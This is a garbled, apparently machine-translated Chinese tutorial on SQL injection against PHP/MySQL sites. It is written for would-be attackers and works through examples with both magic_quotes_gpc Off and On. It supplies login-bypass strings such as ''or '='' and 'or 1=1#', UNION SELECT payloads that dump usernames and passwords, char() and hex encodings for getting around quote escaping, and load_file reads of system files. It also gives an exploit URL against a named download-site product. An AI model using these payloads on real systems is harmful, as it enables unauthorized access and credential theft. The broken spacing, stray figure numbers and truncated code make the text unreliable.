Php injection details

Php injection details this article is mainly for the small dishes, if you are already an old bird, some things may feel boring, but as long as you carefully read, you will find a lot of interesting things.

To read this article, you only need to understand the following.

1. understand how the php + mysql environment is built. we will include relevant articles on the CD. if you are not clear about how to build the php + mysql environment, please refer to this article first, this topic was also introduced in the previous issue.
2. understand the configuration of php and apache, mainly using php. ini and httpd. conf.
In this article, we mainly use the configuration of php. ini. For the sake of security, we usually open php. the security mode in ini, that is, making safe_mode = On, and returning display_errors with php execution errors will return a lot of useful information, so we should disable it,
That is, after display_errors = off is disabled, the php function execution error information will not be displayed to the user.
In the php configuration file php. ini, magic_quotes_gpc is an important configuration option. by default, magic_quotes_gpc = On is used in the later version, and only
The default configuration is magic_quotes_gpc = Off, but some antique items are also used!
What will happen when magic_quotes_gpc = On is in php. ini? don't worry. the sky will not collapse! It only converts all '(single quotation marks), "(double quotation marks), \ (backslash), and null characters in the submitted variables into escape characters containing the backslash, for example, convert 'to \' and \ \\.
This makes us very uncomfortable. many times we have to say BYEBYE to the character type,
But don't be discouraged. we still have a good way to deal with it. let's look down!
3. have a certain php language Foundation and understand some SQL statements. these are very simple. We use very few things, so the charge is still coming!

Let's take a look at what we can do when magic_quotes_gpc = Off, and then we can find a way to solve the problem of magic_quotes_gpc = On.

1. injection when magic_quotes_gpc = Off

Ref = "http://hackbase.com/hacker" target = _ blank> attack
Although magic_quotes_gpc = Off is not safe, the new version also makes
Magic_quotes_gpc = On, but we also find magic_quotes_gpc = Off On many servers, such as www. qichi .*.
Some other programs, such as the vbb Forum, even if you configure magic_quotes_gpc = On, it will automatically eliminate escape characters so that we can take advantage of them.
Magic_quotes_gpc = Off injection methods are still available in large markets.

Next we will explain in detail mysql + php injection in terms of syntax, injection points and injection types.

A: starting with MYSQL syntax
1. First, let's talk about some basic mysql syntaxes. it's a supplementary lesson for children who haven't learned well ~ _~
1) select
SELECT [STRAIGHT_JOIN] [SQL _SMALL_RESULT]
Select_expression ,...
[INTO {OUTFILE | DUMPFILE} 'File _ name' export_options]
[FROM table_references
[WHERE where_definition]
[Group by col_name,...]
[Order by {unsigned_integer | col_name | formula} [ASC | DESC],...]

;]
These are commonly used. select_expression refers to the column to be retrieved. we can use where to limit the conditions, or we can use into outfile to output the select result to the file. Of course, we can also use select to directly output
For example

Mysql> select 'A ';
+ --- +
| A |
+ --- +
| A |
+ --- +
1 row in set (0.00 sec)
For details, see mysql Chinese manual section 7.12.
The following describes some exploitation.
View code first
This code is used for searching.
.........
SELECT * FROM users WHERE username LIKE '% $ search %' order by username
.......
?>

Here, by the way, the wildcard character '%' in mysql is a wildcard, and other wildcards include '*' and '_', where "*" is used to match the field name, "%" is used to match the field value. Note that % must be used with like. another wildcard is the underscore "_", which indicates that the meaning is different from the preceding one, is used to match any single character. In the above code, '*' is used to indicate the names of all returned fields, and % $ search % indicates all content containing the $ search character.

How do we inject miles?
Haha, similar to asp
Submit in form
Aabb % 'or 1 = 1 order by id #
Note: # It indicates the meaning of the comment in mysql, that is, the subsequent SQL statement is not executed, which will be discussed later.
Someone may ask why or 1 = 1 is used,

Import submitted content into SQL statements to become

SELECT * FROM users WHERE username LIKE '% aabb %' or 1 = 1 order by id # order by username

If there is no user name containing aabb, or 1 = 1 causes the return value to be true, so that all values can be returned.

We can also do this.

Submit in form
% 'Order by id #
Or
'Order by id #
Entered into SQL statements
SELECT * FROM users WHERE username LIKE '%' order by id # order by username
And
SELECT * FROM users WHERE username LIKE '%' order by id # order by username
Of course, all content is returned.
Listing all the users, maybe even the password.
Here is an example. a more subtle select statement will appear below. select is actually almost everywhere!
2) Let's take a look at update.
Mysql Chinese manual explains this:
UPDATE [LOW_PRIORITY] tbl_name SET col_name1 = expr1, col_name2 = expr2 ,...
[WHERE where_definition]
UPDATE updates the columns in the row of an existing table with the new value. The SET clause specifies the column to be modified and the value they should be given. if so, it specifies the row to be updated, otherwise, all rows are updated.
For more information, see mysql Chinese manual section 7.17. here we will introduce it in detail.
We can see from the above that update is mainly used for data updates, such as article modification and user data modification. we seem to be more concerned with the latter because ......
Check the code first.
Let's first give the table structure so that you can understand it.
Create table users (
Id int (10) not null auto

Let's build an injection statement.
Enter
A % and 1 = 2 union select 1, username, 3, 4, 5, 6, 7, 8, password, 10, 11 from
Alphaauthor # entered in SQL statements

Select * from alphadb where title like % a % and 1 = 2 union select
1, username, 3, 4, 5, 6, 7, 8, password, 10, 11 from alphaauthor # %
Result 17:

How about it? come out, haha. everything is under control.

C: Let's take a look at various injection attack methods from the injection location.
1) first, let's take a look at background login.
Code First
// Login. php
.......
$ Query = "select * from alphaauthor where UserName ="
. $ HTTP_POST_VARS ["UserName"]. "and
Password = ". $ HTTP_POST_VARS [" Password "]." ";
$ Result = mysql_query ($ query );
$ Data = mysql_fetch_array ($ result );
If ($ data)
{
Echo "background login successful ";
}
Esle
{
Echo "re-login ";
Exit;
}

.........
?>
The Username and password are directly executed in SQL without any processing.
Let's see how we can bypass it?
Which is the most classic one:
Enter both the user name and password
'Or =
Entered into SQL statements
Select * from alphaauthor where UserName = or = and Password = or =
The $ data obtained in this way is definitely true, that is, we have successfully logged in.
There are other bypass methods. The principle is the same. you just need to find a way to make $ data return true.
We can use the following methods.
1.
Enter both the user name and password or a =
SQL
Select * from alphaauthor where UserName = or a = a and Password =
Or a =

2.
Enter or 1 = 1 and '=
SQL
Select * from alphaauthor where UserName = or 1 = 1 and '=
And Password = or 1 = 1 and '=

Enter or 2> 1 and '=
SQL
Select * from alphaauthor where UserName = or 2> 1 and '=
And Password = or 2> 1 and '=

3.
Username input or 1 = 1 # Password input casually
SQL
Select * from alphaauthor where UserName = or 1 = 1 # and
Password = anything

The following part is commented out. of course, the returned result is true.
4.
If admin id = 1, you can

Username input or id = 1 # Password input casually
SQL
Select * from alphaauthor where UserName = or id = 1 # and Password = anything
18

Check 19

How is it? Log in directly!

As the saying goes, nothing can be done.
There are more constructor methods waiting for you to think about after class.

2) The second common injection should be the front-end information display area.
I have already mentioned it many times, and it involves digital, numeric, and so on. I will not repeat it here.
Let's just give an example.
Bihai Chaosheng download site-v2.0.3 lite has an injection vulnerability and the code will not be listed
View results directly
Http: // localhost/down/index. php? Url = & dlid = 1% 20and % 201 = 2% 20 union % 20 select %
18%, 2, password, 4, username, from %
20dl_users
20

Let's see what we want again.
Username alpha
A long string of passwords.
Why do we need to put the password in the 3 field and the username in the 5 field? we have already mentioned above, that is, we guess that the 3 and 5 fields should be strings, the field type of username and password should be the same as the one we want to display, so we put it in this way.
Why do we need 18 fields? I don't know if you still remember that in the introduction of union select, we mentioned that union must have the same number of select fields before and after it. we can increase the number of select to guess that 18 fields are required, only in this way will the content of union select be displayed normally!
3) for other data changes, user registration must be performed on user-level applications.
We have already mentioned the update and insert statements above, because they are not very common and will not be described here. we will discuss some advanced usage techniques for update and insert below.
II. the injection attack teaching session will be introduced below when magic_quotes_gpc = On
When magic_quotes_gpc = On ),
"(Double quotation marks), \ (backslash), and empty characters are automatically converted into escape characters containing the backslash.
This makes the injection method of the numeric model a bubble. at this time, we can only inject the numeric model
Intval () processing, we have already talked a lot about the number type, right? because the number type does not use single quotes, it will naturally not be bypassed, in this case, we can inject it directly.
1) if it is character type, it must look like the following, without quotation marks on the characters.

Here we need to use some string processing functions first,
There are many string processing functions. here we will mainly talk about the following. for details, refer to mysql Chinese reference manual 7.4.10.

Char () interprets the parameter as an integer and returns a string consisting of ASCII code characters of these integers.
Of course, you can also use the hexadecimal character to replace the character. in this way, add 0x before the hexadecimal character. you can see the example below.

// Login. php
......
$ Query = "select * from". $ art_system_db_table [user]."
Where UserName = $ username and Password = ". $ Pw ."";
......
?>

Suppose we know that the background username is alpha.
Converted to ASCII is char (97,108,112,104, 97)
The hexadecimal value is 0x616C706861.
(We will provide hexadecimal and ascii conversion tools on the CD)
All right, enter the following in the browser:

Http: // localhost/site/admin/login. php? Username = char (97,108,112,104, 97) % 23
The SQL statement is changed:

Select * from alphaAut

Hor where UserName = char (97,108,112,104, 97) # and Password =
21

As we expected, he ran smoothly and we got what we wanted.
Of course, we can also construct
Http: // localhost/site/admin/login. php? Username = 0x616C706861% 23
The SQL statement is changed:
Select * from alphaAuthor where UserName = 0x616C706861% 23 # and Password =
Once again we were successful. Have a sense of accomplishment,

Maybe you will ask if we can put # In char ().
Actually char (97,108,112,104, 97) is equivalent to alpha
Note that quotation marks are added to alpha to indicate the alpha string.
We know that if you execute

Mysql> select * from dl_users where username = alpha;
ERROR 1054 (42S22): Unknown column alpha in where clause
An error is returned. Because he thinks alpha is a variable. So we have to put quotation marks on alpha.
As follows:
Mysql> select * from dl_users where username = alpha;
This is correct.
If you put # in there, it becomes alpha #
Into SQL statements
Select * from dl_users where username = alpha #;
Of course there is nothing, because there is no alpha # User.
Okay. let's take a look at the example below,

// Display. php
......
$ Query = "select * from". $ art_system_db_table [article]."
Where type = $ type;
......
?>

The code displays the content based on the type. $ type is not filtered and put into the program without quotation marks.
Assume that the type contains the xiaohua class, and the char () of xiaohua is converted
Char (120,105, 97,111,104,117, 97)

We build
Http: // localhost/display. php? Type = char (120,105, 97,111,104,117, 97) and 1 = 2 union select 1, 2, username, 4, password, 6, 7, 8, 9, 10, 11 from alphaauthor
In the SQL statement:
Select * from ". $ art_system_db_table [article]."
Where type = char (120,105, 97,111,104,117, 97) and 1 = 2 union select 1, 2, username, 4, password, 6, 7, 8, 9, 10, 11 from alphaauthor
Let's take a look. our user name and password are still available! No. imagine P.

2) some may ask if the powerful load_file () can be used in the case of magic_quotes_gpc = On?
This is the problem we will solve below. the format of load_file () is load_file ('file path)
We found that you only need to convert the 'file path to char. Try it.
Load_file ('C:/boot. ini)
Load_file (char (111,111,116, 46,105,110,105 ))
2

Put it in the specific injection
Http: // localhost/down/index. php? Url = & dlid = 1% 20and % 201 = 2% 20 union % 20 select %
April 2, load_file (char
(111,111,116, 46,105,110,105,
17,18
View 3

Let's see the boot. ini content.
Unfortunately, into outfile cannot be bypassed, or it will be even better. However, there is still a place where select * from table into outfile can be used, that is... (sell a customs first, and we will tell you below)